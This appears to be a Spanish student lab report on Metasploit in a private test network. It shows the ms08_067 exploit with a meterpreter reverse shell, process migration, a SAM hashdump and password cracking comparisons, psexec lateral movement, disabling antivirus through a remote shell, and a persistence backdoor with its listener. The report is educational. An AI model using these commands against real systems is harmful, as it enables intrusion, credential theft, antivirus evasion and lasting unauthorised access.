METASPLOIT PRACTICA3
2012
Javier García Cambronel SEGUNDO DE ASIR
22/01/2012
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 1
ACCEDIENDO A LAS CONTRASEÑAS DE WINDOWS
MIGRACIÓN A UN PROCESO
DESCIFRANDO LAS CONTRASEÑAS OPHCRACK VS OTROS
ACCEDIENDO A OTRAS MÁQUINAS
PROBANDO DE OTRA FORMA IDENTIFICANDONOS CON
CONTRASEÑA
DESACTIVANDO EL ANTIVIRUS NOD 32 VS AVAST
PERSISTENCIA O PUERTA TRASERA
CON ANTIVIRUS DESACTIVADO
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 2
ACCEDIENDO A LAS CONTRASEÑAS DE WINDOWS
Bueno, Ahora vamos a utilizar el exploit ultra conocido ms08_067 el cual va a atacar el
puerto 445 lo primero que hacemos será ingresar el comando
use windows/smb/ms08_067_netapi
Ahora vamos a utilizar una ataque reverse_tcp el cual nos va a conseguir en principio una
sesión meterpreter
Vemos con show options los requerimientos necesarios para la ejecución de este exploit y si
son requeridos.
Entonces ahora lo que hacemos es seleccionar el host local que va a ser el atacante
Set lhost 192.168.1.36
También la dirección ip del equipo al que vamos a atacar
Set rhost 192.168.1.35
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 3
Y seguidamente lanzamos el exploit escribiendo exploit
Vemos como la sesión se crea perfectamente
Entonces lo siguiente que hacemos es escibir el comando ps en meterpreter
El comando 'ps' muestra una lista de los procesos ejecutandose en el objetivo.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 4
MIGRACIÓN A UN PROCESO
Necesitamos estar (migrar) en un proceso que no tenga restricciones de acceso a la
información sobre las cuentas (tiene que ser un proceso de System) y ¿porque?
Para comenzar debemos tener en cuenta que en Windows existen en realidad 3 tipos de
cuenta de usuario y no 2 como siempre se cree, estos tipos son:
Cuenta limitada
Administrador del sistema
SYSTEM
Las dos primeras son muy conocidas por todo aquel que tiene un mediano conocimiento de
Windows. La tercera, SYSTEM, es una cuenta a la que normalmente no se tiene acceso, es
una cuenta creada por el equipo de Microsoft, como una super cuenta. Esta cuenta
equivaldría a una cuenta Administradora de Administradores, como el -su de Linux. Tiene los
permisos para hacer lo que sea en el sistema en otras palabras con esta cuenta te vuelves
Rey de reyes.
Aquí en el ejemplo, he escogido este proceso que cumple los requisitos.
Como vemos al intentar la migración hacia ese servicio nos deniega el acceso, entonces
intentamos otra migración.
Lo intentamos con el proceso anterior, el cual también cumple con los requisitos
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 5
Lanzamos el módulo de captura de cuentas (hashdump)
El post modulo 'hashdump' volcara los contenidos de la base de datos SAM.
run post/windows/gather/hashdump
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 6
DESCIFRANDO LAS CONTRASEÑAS COMPARATIVA
Vemos que a nosotros la contraseña que no interesa sacar es esta, normalmente nadie tiene
activada por defecto la cuenta Administrador que se detecta en Windows XP con ese
nombre.
OPHCRACK VS SAM Inside
Vemos el tiempo que hemos tardado en adivinar admin como contraseña es de 25,34
segundos
Sam inside Ha sido instantáneo es decir dos segundos a lo sumo.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 7
OPHCRACK VS ONLINE
Vemos que el tiempo en adivinar como contraseña Administrador es de 41,14 segundos
El desencriptador online me dice que pasword inválido pero para inválido esta utilidad que
esta coja de opciones y de posibilidades y sus resultados son malos por no decir nulos.
http://www.hash-cracker.com/index.php#anchor
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 8
OPHCRACK VS PASSWORD PRO
Vemos que el tiempo en adivinar Asir2012 como contraseña ha sido de 49,31 segundos
Con PasswordsPro al cabo de 7 minutos no tenemos ningún resultado asique lo dejamos
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 9
OPHCRACK VS GPU BRUTEFORCE VS SAMINSIDE
Vemos que al intentar descifrar la contraseña Asir.2012. No puede.
Probamos Con GPU BRUTEFORCE y vemos que tampoco puede eso si, nos da un falso
positivo
Con SAMInside al cabo de 15 minutos y viendo lo que queda de análisis lo damos por
finalizado como que no ha sacado nada, pero es quizá el que más posibilidades tiene debido
a sus diccionarios.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 10
ACCEDIENDO A OTRAS MÁQUINAS
Ejecutamos el siguiente comando y escogemos ese exploit
use windows/smb/psexec
Seleccionamos el PAYLOAD que vamos a utilizar
set payload windows/meterpreter/reverse_tcp
Y configuramos todas las opciones que sean necesarias
En nuestro caso, los siguientes comandos
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 11
Seleccionamos el nombre de usuario
Y especificamos la contraseña sin desencriptar pues lo tendría que hacer automáticamente
Iniciamos el exploit, pero vemos que la sesión no se crea
Entonces probamos, poniendo la contraseña ya desencriptada, pues ya sabíamos que era
admin y volvemos a probar, como vemos nos da el mismo error lo cual demuestra que no es
un error de desencriptación de la contraseña.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 12
PROBANDO DE OTRA FORMA IDENTIFICANDONOS CON CONTRASEÑA
Esta vez escogemos el siguiente exploit
Y configuramos todas sus opciones como vemos en la siguiente imagen
Intentamos la conexión y vemos que las tres veces que nos intentamos identificar, no resulta
da resultado
¿POR QUE NO VAN?
Tengo mi teoría. Buscamos las características de estos y vemos que son lo suficiente antiguos
para que no se ejecuten en nuestro Windows.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 13
DESACTIVANDO EL ANTIVIRUS NOD 32 VS AVAST
Ejecutamos el siguiente comando y vemos que se ejecuta y se queda detectando un posible
antivirus y vuelve a salir a la consola de meterpreter. Entonces lo que hacemos es pensar
que a lo mejor por ser un antivirus nuevo y que tiene protección ante estos ataques.
Nos vamos al Equipo de la víctima y como podemos apreciar el servicio está iniciado
Pero bueno, no desesperamos, no deja de ser un servicio entonces ejecuto el comando Shell
para abrir una consola en el ordenador remoto, el de la víctima
Con el comando net start miro todos los servicios que se están ejecutando hasta que damos,
con el que pertenece a nuestro Antivirus
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 14
Entonces, con el comando net stop “ESET Services” lo intentamos parar, pero como vemos
no nos deja y nos dice que esta opción no está permitida.
Como podemos ver nos vamos a las opciones dentro del ordenador de la víctima y no
tenemos la opción de detener el servicio, pese a tener, derechos de Administración en el
sistema.
Sin embargo probamos con AVAST y con un par de simples comandos lo hemos desactivado
con lo que en esta batalla de antivirus el ganador Habría sido NOD32 asique procedemos de
nuevo a su instalación ;) .
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 15
PERSISTENCIA O PUERTA TRASERA
La utilidad “persistence” instala un agente que requiere especificar cuándo se lanza (-X en
el momento del arranque de la Seguridad de la máquina), que espere 50 segundos (-i 50)
antes de reintentar la conexión, el puerto que se va a ejecutar (-p 444) y la máquina remota
(-r).
run persistence -X -i 50 -p 444 -r 192.168.1.35
La única forma de eliminar el agente es borrar el script que se ha instalado en
C: \windows\temp, y la entrada que se ha hecho en el registro
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ con la extensión que vemos
Reiniciamos la máquina y vemos que el antivirus ha detectado el archivo malicioso y lo ha
eliminado.
[METASPLOIT] 22 de enero de 2012
SEGUNDO DE ASIR Página 16
ANTIVIRUS DESACTIVADO
Volvemos a repetir los pasos pero esta vez con el antivirus desactivado
Siempre que quisiéramos acceder al sistema segaríamos los siguientes pasos
Ejecutamos el siguiente comando desde la consola de metaspoit use exploit/multi/handler
Introducimos el payload correspondiente set payload windows/meterpreter/reverse_tcp
Y miramos las opciones pues para acceder al sistema ahora los requisitos han cambiado y
como podemos ver requiere de el puerto del proceso.
Entonces se lo indicamos con el comando lport y el número del proceso, en este caso seria
set lport 444
Si esto fuera una nueva sesión en la que no tuviéramos indicada la ip de nuestra victima, lo
haríamos como en la siguiente imagen.
Y ya solo nos quedaría lanzar el exploit y ver como accedemos a una sesión en nuestra
víctima y ya tendríamos la sesión abierta donde escuchar las conexiones.